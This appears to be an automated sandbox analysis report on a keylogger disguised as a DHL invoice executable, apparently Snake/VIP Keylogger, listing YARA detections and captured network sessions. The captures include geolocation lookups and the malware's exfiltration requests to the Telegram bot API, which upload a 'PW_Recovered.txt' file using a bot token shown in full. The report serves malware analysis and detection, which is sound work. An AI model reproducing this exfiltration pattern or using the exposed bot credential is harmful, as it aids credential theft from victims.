                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fbad839e93843da-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1608&rtt_var=605&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1803582&cwnd=203&unsent_bytes=0&cid=c99f297818088157&ts=150&x=0"
                                                                                                                      2025-01-02 12:45:10 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      2192.168.2.549719188.114.97.34436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:22 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-02 12:45:22 UTC865INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:22 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1136711
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0RmQ41ugpCUt%2FFDGbjHKNDPjXYTyKyV4lTDHq%2FbTD5qz5%2BYmr3Hg9hlfsxFF1cuNIIHGg0PpD4rMXk%2FE1Ksu%2FJBt31QHUctofSugNk%2BVYqZm3xSre8h%2FQM3zlAh6O6%2BxfLz7AaeD"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fbad8869bb5de94-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1456&min_rtt=1444&rtt_var=567&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1887524&cwnd=231&unsent_bytes=0&cid=3de3b8967b2f5499&ts=149&x=0"
                                                                                                                      2025-01-02 12:45:22 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.549807188.114.97.34436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:36 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-02 12:45:36 UTC863INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:36 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1136725
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gox0%2FgNjDCB95rkzvotqZ0nYqGEQi6kZT57IVCpohLYfT0EgAIoR%2FhHu3Zq2NPd7QV9jjmUIFWYXxQf%2Bx2JNU3uu7F6aerp9KvHnof0FjITGXjUh%2BpAe5ppuGUGe%2FfYy%2F0h%2BOA9N"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fbad8e11d290f46-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1718&rtt_var=666&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1616832&cwnd=229&unsent_bytes=0&cid=03562a205d885bec&ts=165&x=0"
                                                                                                                      2025-01-02 12:45:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.549818188.114.97.34436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:38 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-02 12:45:38 UTC859INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:38 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1136727
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EyLzS1hdj5UOrk%2FoFIAoFj7%2FiOWmZCPoSx2nVeHW71TZf9fW%2Bcp6SU7sRvyIEer3%2BiUKRkKP7%2Blovl81e5t9nUKhBd167JZfU134i5BmQmWj0LRrexW8aEeq8GBHqObtSaNgAR5q"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fbad8e90dfc0f53-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1569&rtt_var=601&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1803582&cwnd=193&unsent_bytes=0&cid=eaac95aa924bc821&ts=142&x=0"
                                                                                                                      2025-01-02 12:45:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.549825188.114.97.34436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:39 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-02 12:45:39 UTC857INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:39 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1136728
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5mmOkQS2LxJRZBuLjKcaFSO8WHXPbmS%2BATHWM%2BdzUUa9ijtGyraBcCQh%2F5rc02faaHqVx2AkZTakJryArRh1wvjUPA0kh0hPYXYIQntG6kWq1fx4kCk1zttvc9ufn%2F38Pef46NmA"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fbad8f0cc9a43d7-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2019&min_rtt=2019&rtt_var=758&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1442687&cwnd=212&unsent_bytes=0&cid=89a2b521284ad6e7&ts=139&x=0"
                                                                                                                      2025-01-02 12:45:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.549841188.114.97.34436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                      Host: reallyfreegeoip.org
                                                                                                                      2025-01-02 12:45:42 UTC863INHTTP/1.1 200 OK
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:42 GMT
                                                                                                                      Content-Type: text/xml
                                                                                                                      Content-Length: 362
                                                                                                                      Connection: close
                                                                                                                      Age: 1136731
                                                                                                                      Cache-Control: max-age=31536000
                                                                                                                      cf-cache-status: HIT
                                                                                                                      last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lKDN4UsAPkOL%2FxccZDG9CbqJfCny%2FCJj5dnfdgEx3xVcvOLKVRy5l1p%2BfPVvM7r%2Bc%2BdAvM3AcMy5CjFsjM%2BKq7m9PQnLIBF7rHiwAeLzbFM5YDbAf%2F41lUrgMBCkbHuMdsAATNFe"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 8fbad9031ceaefa1-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1954&min_rtt=1948&rtt_var=744&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1457813&cwnd=165&unsent_bytes=0&cid=28368d351a19fcf6&ts=132&x=0"
                                                                                                                      2025-01-02 12:45:42 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.549868149.154.167.2204436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:46 UTC334OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:642294%0D%0ADate%20and%20Time:%2004/01/2025%20/%2001:55:27%0D%0ACountry%20Name:%20%0D%0A%5B%20642294%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                      Host: api.telegram.org
                                                                                                                      Connection: Keep-Alive
                                                                                                                      2025-01-02 12:45:46 UTC344INHTTP/1.1 404 Not Found
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:46 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 55
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2025-01-02 12:45:46 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      8192.168.2.549879149.154.167.2204436608C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-02 12:45:47 UTC346OUTPOST /bot7289689475:AAGFe7RPg26YJkJcwIEyxRK_I9DsBw4teZU/sendDocument?chat_id=7360475312&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2c94d88c6ec6
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 580
                                                                                                                      2025-01-02 12:45:47 UTC580OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 63 39 34 64 38 38 63 36 65 63 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 36 34 32 32 39 34 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 32 2f 30 31 2f 32 30 32 35 20 2f 20 30 37 3a 34 35 3a 30 32
                                                                                                                      Data Ascii: --------------------------8dd2c94d88c6ec6Content-Disposition: form-data; name="document"; filename="PW_Recovered.txt"Content-Type: application/x-ms-dos-executablePW | user | VIP Recovery PC Name:642294Date and Time: 02/01/2025 / 07:45:02
                                                                                                                      2025-01-02 12:45:48 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Thu, 02 Jan 2025 12:45:48 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 543
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2025-01-02 12:45:48 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 35 32 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 32 38 39 36 38 39 34 37 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 61 72 72 79 73 74 61 72 5f 62 6f 74 31 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 62 61 72 72 79 35 73 74 61 72 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 36 30 34 37 35 33 31 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 61 69 72 72 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4d 6f 65 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 61 69 72 72 79 6d 6f 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 35 38 32
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":25291,"from":{"id":7289689475,"is_bot":true,"first_name":"Barrystar_bot1","username":"barry5star_bot"},"chat":{"id":7360475312,"first_name":"Bairry","last_name":"Moe","username":"Bairrymoe","type":"private"},"date":173582


                                                                                                                      Statistics

                                                                                                                      CPU Usage

                                                                                                                      Click to jump to process

                                                                                                                      Memory Usage

                                                                                                                      Click to jump to process

                                                                                                                      High Level Behavior Distribution

                                                                                                                      Click to dive into process behavior distribution

                                                                                                                      Behavior

                                                                                                                      Click to jump to process

                                                                                                                      System Behavior

                                                                                                                      General

                                                                                                                      Target ID:0
                                                                                                                      Start time:07:44:59
                                                                                                                      Start date:02/01/2025
                                                                                                                      Path:C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
                                                                                                                      Imagebase:0x330000
                                                                                                                      File size:1'106'432 bytes
                                                                                                                      MD5 hash:49A44E1BD7AE31824843C4316F35EB35
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      General

                                                                                                                      Target ID:2
                                                                                                                      Start time:07:45:02
                                                                                                                      Start date:02/01/2025
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
                                                                                                                      Imagebase:0xd30000
                                                                                                                      File size:45'984 bytes
                                                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Yara matches:
                                                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000002.00000002.4475356588.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4475356588.00000000031A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                      • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                      Reputation:high
                                                                                                                      Has exited:false

                                                                                                                      Disassembly

                                                                                                                      Reset < >

                                                                                                                        Execution Graph

                                                                                                                        Execution Coverage:3.1%
                                                                                                                        Dynamic/Decrypted Code Coverage:1.3%
                                                                                                                        Signature Coverage:5%
                                                                                                                        Total number of Nodes:1999
                                                                                                                        Total number of Limit Nodes:51
